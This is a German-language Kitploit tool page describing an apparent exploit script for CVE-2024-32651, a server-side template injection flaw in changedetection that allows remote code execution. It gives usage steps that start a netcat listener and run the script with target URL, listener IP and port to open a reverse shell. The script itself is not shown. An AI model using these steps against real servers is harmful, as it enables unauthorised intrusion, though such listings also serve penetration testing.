Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32651-changedetection-RCE — Exploit für Server-Side Template Injection | Kitploit
Tools/GitHubGitHub/s0ck3t-s3c/cve-2024-32651-changedetection-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubs0ck3t-s3c/cve-2024-32651-changedetection-rce

CVE-2024-32651-changedetection-RCE

Exploit für Server-Side Template Injection

Repository anzeigen
433vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-32651 changedetection < 0.45.20 - Remote-Code-Ausführung (RCE)

Server-Side Template Injection Exploit!!

1. Titel

Remote-Code-Ausführung durch Server-Side Template Injection (SSTI) in einer verwundbaren Webanwendung

2. Beschreibung

Dieses Exploit zielt auf eine Webanwendung ab, die anfällig für Server-Side Template Injection (SSTI) ist. Durch Ausnutzung dieser Schwachstelle kann ein Angreifer beliebige Befehle auf dem Server ausführen. Das bereitgestellte Python-Skript automatisiert den Ausnutzungsprozess, indem es eine Payload übermittelt, die eine Reverse Shell auslöst.

3. Informationen zur Schwachstelle

  1. CVE-ID: CVE-2024-32651
  2. Betroffene Systeme: Webanwendungen, die Server-Side Template Injection (SSTI) verwenden und eine verwundbare Konfiguration aufweisen.

4. Proof of Concept

Um die Schwachstelle zu reproduzieren, führen Sie das bereitgestellte Python-Skript gegen die verwundbare Webanwendung aus. Stellen Sie sicher, dass ein Listener (z. B. nc -lvp 9999) läuft, um die Reverse-Shell-Verbindung zu erfassen.

5. Verwendung

  1. Speichern Sie das Skript in einer Datei mit dem Namen CVE-2024-32651.py.

  2. Installieren Sie die erforderlichen Python-Bibliotheken, falls noch nicht geschehen:

    root@kitploit:~
    pip install requests beautifulsoup4
    
    
  3. Um das Skript zu verwenden, geben Sie die folgenden Befehlszeilenargumente an:

  • --url: Basis-URL der verwundbaren Webanwendung (z. B. http://10.10.10.10:5000).
  • --port: Port des Listeners (z. B. 9999).
  • --ip: IP-Adresse des Listeners (z. B. 10.10.50.22).
  • --notification: (Optional) Benachrichtigungs-URL, wenn Sie eine bestimmte Benachrichtigungs-URL verwenden möchten.
  1. Führen Sie das Skript mit Python 3 und den erforderlichen Argumenten aus. Die Syntax lautet:
    root@kitploit:~
    python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
    

6. Danksagungen

Diese korrigierte Version des Exploits basiert auf einem ursprünglichen Exploit, der von Zach Crosman (zcrosman) mit der EDB-ID: 52027 veröffentlicht wurde. Sie können den ursprünglichen Exploit hier einsehen. Ich danke Zach Crosman für seinen Beitrag zur Sicherheitscommunity.

Tool herunterladen